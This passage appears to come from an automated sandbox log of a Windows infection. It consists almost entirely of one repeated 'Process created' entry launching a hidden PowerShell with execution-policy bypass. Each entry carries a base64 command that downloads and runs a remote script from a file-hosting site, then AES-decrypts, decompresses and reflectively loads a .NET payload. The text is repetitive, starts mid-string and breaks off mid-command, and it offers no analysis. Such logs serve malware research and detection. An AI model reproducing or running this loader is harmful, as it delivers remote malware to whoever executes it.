NFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 